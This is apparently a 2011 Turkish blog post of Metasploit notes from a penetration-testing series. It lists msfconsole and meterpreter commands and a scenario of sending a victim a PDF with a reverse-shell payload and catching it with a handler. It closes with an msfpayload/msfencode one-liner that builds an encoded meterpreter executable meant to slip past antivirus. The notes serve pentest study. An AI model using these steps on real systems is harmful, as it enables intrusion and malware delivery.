25 Temmuz 2011 Pazartesi

Pentest in Practice - VII: Metasploit

Metasploit

  • Exploit araştırma => Security Focus
  • Metasploit'taki Payload: Exploit sonrası çalıştırılacak içerik.
  • Payload içeriğinin anlaşılmaması için "encoder".
  • Auxiliary: Exploit etmede yardımcı araçlar.
  • Metasploit kullanırken sıkça kullanılan komutlar:
    • > help
    • > search <ms08_067>
    • > search <tomcat>
    • > show
    • > show exploits
    • > use <exploit-adı>
    • > info <exploit-adı> (ya da exploit içindeyken sadece info yazmak yeterli)
    • > back
    • > show payloads => Exploit seçildikten sonra kullanılırsa sadece o exploit ile kullanılabilecek payload'lar listelenir.
    • > set payload <payload-adı>
    • > show options => Set edilmesi gereken parametreleri gösterir. Ayrıca hangi payload'un seçili olduğunu ve o payload'un parametrelerini gösterir.
    • > set RHOST <ip-addr> => Bir option (parametre) set etme örneği
    • > check => Tüm değer atamalar da tamamlandıktan sonra exploit çalışıp çalışmadığı testi.
    • > exploit => Run!
  • borwser-autopwn => Tüm browser açıklıklarını barındıran bir sayfa hazırlar, bağlanan istemci browser'ı üzerinde exploit'ları tek tek dener.
  • Sık kullanılan bazı meterpreter komutları:
    • meterpreter> getsystem
    • meterpreter> getuid
    • meterpreter> execute -f "cmd.exe"
    • meterpreter> execute -f "cmd.exe" -i
    • meterpreter> exit
  • Senaryo: Reverse shell açan bir payload barındıran PDF dosyası oluşturarak kurbana gönderdik. Sonra dinleme moduna geçiyoruz:
    • > use exploit/multi/handler
    • > set payload windows/meterpreter/reverse_tcp
    • > set LHOST <ip>
    • > set LPORT <port>
    • > exploit
  • msfpayload => Trojan vb payload oluşturma.
  • metsvc => Meterpreter payload'unu makinede servis olarak çalıştırır.
  • msfencode => Payload'u encode ederek binary dosyaya gömer. Antivirüs programlarının işini zorlaştırmaktır amaç.
  • msfpayload ve msfencode birlikte kullanımı:
    • msfpayload /windows/meterpreter/bind_tcp LPORT=443 | msfencode -e x86/shikata_ga_hai -i 5 > ajanX.exe

Hiç yorum yok:

Yorum Gönder

Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V

Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....